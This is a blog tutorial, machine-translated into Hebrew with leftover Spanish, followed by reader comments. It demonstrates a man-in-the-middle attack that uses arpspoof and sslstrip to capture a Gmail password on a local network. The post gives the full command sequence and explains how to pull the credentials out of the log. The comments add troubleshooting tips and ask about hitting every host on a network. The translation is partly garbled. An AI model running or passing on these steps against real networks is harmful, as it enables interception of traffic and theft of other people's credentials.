ArpSpoofing ו- SSlstrip בפעולה.

שלום בלוגרים.

להיום יש לי מדגם קטן של כמה מסוכן זה יכול להיות מחובר בכל רשת ללא אבטחה של כל כך הרבה מאיתנו אוהבים.

להיום אני הולך להשתמש ב- ArpSpoofing עם Sslstrip כדי לקבל סיסמת Gmail. כדי להפוך את הסביבה לשליטה יותר, יצרתי חשבון בשם "testarp@gmail.com".

ומכיוון שאני לא אוהב את ההקדמות, בואו נעבור לעניינים.

אני לא אחראי בכל עת למה שהם יכולים לעשות עם המידע הבא. אני עושה את זה אך ורק למטרות חינוכיות

סביבה

למבחן זה מה שיש לנו הוא הבא:

1. תוקף: המחשב השולחני או המחשב השולחני שלי מכיל את דביאן וויזי. ממאגרים תוכלו להתקין סטריפ y dsniff להגיע לקבל זיוף ארפי

2. קורבן: הקורבן הוא טאבלט אנדרואיד שרוצה לראות רק את הדואר שלו דרך הדפדפן.

3. המדיום: האמצע הוא שלי נתב DPC2425 של סיסקו

כתובות.

כתובת התוקף: 172.26.0.2

כתובת הנתב: 172.26.0.1

כתובת הקורבן: 172.26.0.8

ההתקפה:

כדי להבין קצת יותר איך ההתקפה עובדת, אתה יכול ללכת אל הישן שלי POST

הדבר הראשון שנעשה למתקפה זו הוא להפעיל את הקדימה כדי שהמחשב שלנו יוכל להעביר את המידע לקורבן מבלי שהם מבינים זאת. (אחרת זו תהיה מתקפת מניעת שירותים)

לשם כך נשתמש:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

כל פקודה בחלון קונסולה ישיר.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

תמונת מצב 1

אז איך נקבל את מה שאנחנו רוצים?

בואו נכנס תחילה לדואר שלנו בטאבלט. במהלך הכניסה אנו רואים שאלפי ואלפי דברים מופיעים בקונסולה שלנו.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

עם Control + W אנו מחפשים משהו שנקרא SECURE POST.

ואנחנו נראה משהו כזה.

תמונת מצב 2

בין השורה הענקית שאי אפשר לראות אותה ניתן למצוא את הדוא"ל והסיסמה של הקורבן.

אז אנחנו רצים ימינה עד שלבסוף אנו רואים את האור בקצה המנהרה.

תמונת מצב 3

בהזדמנות אחרת נראה כיצד אנו יכולים להגן על עצמנו מעט מהתקפות אלה.

לגבי


השאירו את התגובה שלכם

כתובת הדוא"ל שלך לא תפורסם. שדות חובה מסומנים *

*

*

  1. אחראי לנתונים: מיגל אנחל גטון
  2. מטרת הנתונים: בקרת ספאם, ניהול תגובות.
  3. לגיטימציה: הסכמתך
  4. מסירת הנתונים: הנתונים לא יועברו לצדדים שלישיים אלא בהתחייבות חוקית.
  5. אחסון נתונים: מסד נתונים המתארח על ידי Occentus Networks (EU)
  6. זכויות: בכל עת תוכל להגביל, לשחזר ולמחוק את המידע שלך.

  1.   @Jlcmux דיג'ו

    אני מנצל הזדמנות זו כדי לומר שכאשר פורסם הפוסט, הפקודות לא היו נכונות.

    בסוף הפקודה iptables חסר את 8080 שנמצא בשורה אחרת. ואז פקודות ה- arpspoof היו באותו קו. כל פקודה נמצאת בשורה אחרת.

    אני מקווה שהעורך רואה את זה ויכול לתקן.

    ברכות.

    1.    מנואל דה לה פואנטה דיג'ו

      ביצעתי את התיקונים שאתה מזכיר, האם זה בסדר?

      אם אתה מתכוון להכניס קוד לערך מועדף, השתמש בתצוגת HTML וודא שהמאמר תקין לפני שאתה שולח אותו לממתינים. תודה.

  2.   לואיס דיג'ו

    מצמרר לדעת שמי מאיתנו שאין לנו ידע כל כך פגיע. מידע טוב מאוד גם כשאני מבין מעט בנושא אני מבין את החשיבות. תודה!
    לגבי

  3.   גיסקארד דיג'ו

    אבל זה עובד רק אם התוקף והקורבן נמצאים באותה רשת. בכל מקרה נראה לי שאם (בהיותך באותה רשת) אתה מתחבר באמצעות HTTPS זה לא קורה מכיוון שהנתונים מוצפנים לפני שעזבת את המחשב שלך. אם אתה מתחבר באמצעות HTTP (ללא S) אני חושב שאפילו מסתכל בכבל הרשת אתה רואה את המפתחות.

    1.    @Jlcmux דיג'ו

      זה לא נכון. אני פורץ מפתח gmail ואם אתה מבחין ב- gmail משתמש ב- https. כך? העניין הוא שלמרות ש- https מאובטחת, זה תלוי ב- http. אז זה לא כל כך בטוח.

      אל תתוודה כל כך הרבה על https ש- S לא מיועד לסופרמן זה בשביל "בטוח"

    2.    רטן דיג'ו

      זה עובד עם או בלי https, ניסיתי את זה עם הפצת לינוקס מיוחדת יותר וזה עובד בלי בעיות

    3.    מנואל דה לה פואנטה דיג'ו

      אתה יכול להשתמש בו במדויק כדי להעביר שיעור למי שגונב את ה- Wi-Fi שלך. 😀

      זה פחות או יותר כמו שאמרו מזמן בבלוג של צ'מה אלונסו:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    זוהר דיג'ו

        אוסטיה, נהדר מה זה עושה! ואז הם אומרים לפרנואידי שלי בכל פעם שאני משתמש ב- VPN כשהם הולכים לבדוק את חשבון הבנק ...). אגב, אתה צריך לראות כמה אנשים ציניים בתגובות ... אם בסופו של דבר זה גונב ...

        1.    אליוטיים 3000 דיג'ו

          כעת עלינו לערוך הדרכה כיצד ליצור ולהציע שירות VPN משלך.

      2.    Daniel דיג'ו

        הסיפור שאתה מקשר הוא מעניין מאוד, אפילו נראה שהוא ראוי לספר רומן, וזה גורם לי לזכור מתי השתמשתי באינטרנט של שכני ולמרות שאני אומר שאני מכיר את הנושא, אני חושב שלעולם לא יכולתי לראות את הממדים האמיתיים של הסכנה שיכולתי להחזיק מעמד, למזלי, הם שינו את הסיסמה רק ל- WPA2 וכאן התחיל הסיפור שלי עם ספק שירותי האינטרנט haha

    4.    מאוריציוס דיג'ו

      לכן הכותרת אומרת Sslstrip בפעולה.

      זה עובד, כל עוד התוקף נמצא באמצע

  4.   בקרוב דיג'ו

    איזה גל אתה עובד בפריזמה? -.-
    לא.
    מה אתה מחכה כדי לשלוח את בקשתך XD
    דרישת שלום
    פוסט טוב

  5.   auroszx דיג'ו

    מעניין, אני אעשה מבחן חינוכי אחר כך ... אולי אוכל אפילו להסיר את הסיסמה ל- WiFi וליהנות קצת 😛
    בכל מקרה, האם אתה יכול לעשות משהו דומה כדי לשלוח דפים שונים לדפים שהיעד ביקש? למשל, הם רוצים לפתוח את פייסבוק ואני מפנה אותם לגוגל? 😛

    1.    @Jlcmux דיג'ו

      כן. אבל הכל גליל שונה מאוד.

      אולי אפרסם את זה אחר כך.

  6.   חדשני דיג'ו

    הודעה טובה מאוד, הנושאים האלה מאוד חינוכיים, ועכשיו אנחנו צריכים להיות מסוגלים להתמודד עם ההתקפה הזו, מכיוון שחלק (כמוני) מתחבר לרשתות ציבוריות (האוניברסיטה למשל) יהיה מועיל להימנע מכך.

    ברכות!

  7.   פשוט-משתמש אחר-dl דיג'ו

    זה לא עבד בשבילי 🙁

  8.   ווקר דיג'ו

    משהו לא מצליח לי כאן, מלבד העובדה שחיבורי https מוצפנים באמצעות אישור שרת (ברגע שיש לך את האישור במחשב שלך, הדפדפן שלך אחראי על ההצפנה) עם iptables אתה מפנה את יציאה 80 (http), ולא 443 , שזה https

    1.    @Jlcmux דיג'ו

      גם אני חשבתי כך. העניין הוא שלמרות ש- https היא "מאובטחת", לרוע המזל זה תלוי ב- http. אז sslstrip מנצל זאת, זה גורם לדפדפן להאמין שהוא משתמש באישורי https אבל זה לא.

      1.    ווקר דיג'ו

        חרא קדוש! אבל הדפדפן אמור לראות אזהרה כמו "האישור הזה מגיע מאתר חשוד או משהו כזה" ... אני בהחלט אצטרך לעשות בדיקות XD

        1.    @Jlcmux דיג'ו

          לא, שום דבר לא יוצא.

  9.   פשוט-משתמש אחר-dl דיג'ו

    סוף סוף זה עבד בשבילי
    אני מחובר ברשת WEP עם סיסמה, וזה הראה לי את הסיסמה בכל מקרה ישירות.

    שאילתה. האם אתה יכול לעשות את אותו ההליך אך עבור כל המחשבים המחוברים לרשת, במקום שיהיה לך קורבן אחד?

    1.    @Jlcmux דיג'ו

      כן אתה יכול. אבל לא עשיתי ניסויים. נסה זאת בעצמך וספר לנו מה שלומך.

  10.   19. סיניק דיג'ו

    הדבר היחיד שאני מקבל עם זה הוא שהמכונה של הקורבן יוצאת לא מקוונת, אבל ה- slslstrip לא מראה לי כלום: /

    1.    @Jlcmux דיג'ו

      עליך להשבית את חומת האש לרגע. או לפחות לאפשר חיבורים נכנסים.

  11.   מר בלאק דיג'ו

    בדיקה ואני יכולנו לראות רק את שם המשתמש והסיסמה של דף הפייסבוק, ב- gmail לא מצאתי תוצאות ביומן, כמו כן הייתי זקוק רק לשורה של arpspoof «arpspoof -i -t«. מצד שני, מכונת הקורבן לא הצליחה לפתוח כמה עמודים. אמשיך בחקירה, זה מאוד מעניין. עזרה למי שמשתמש במנג'רו, החבילות להתקנה הן: dsniff (הנה arpspoff), מפותל ו- python2-pyopenssl. ניתן להוריד את Sslstrip מכאן: http://www.thoughtcrime.org/software/sslstrip/
    כדי להריץ אותו $ python2 sslstrip.py
    ברכות.

  12.   מר בלאק דיג'ו

    זה לא יצא אבל הקו arpspoof הוא: #arpspoof -i int -t ip-victim ip-router

  13.   גילברט דיג'ו

    תראה אני עושה בדיוק את מה שאתה אומר:

    הד "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp-destination-port 80 -j REDIRECT -to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    הבעיה היא שהקורבן, שהוא מחשב אחר שיש לי כאן בחדר שלי, נותר ללא קשר לנקודה שעלי להפעיל מחדש את הנתב, מה אני יכול לעשות, לעזור לי.

    דבר נוסף שאני עובד עם מכונה וירטואלית, וכשאני מבצע את הפקודה iwconfig, wlan0 לא מופיע, וגם כשאני מבצע ifconfig, אולם אם יש לי אינטרנט במחשב הווירטואלי שלי מה עם ממשק eth0.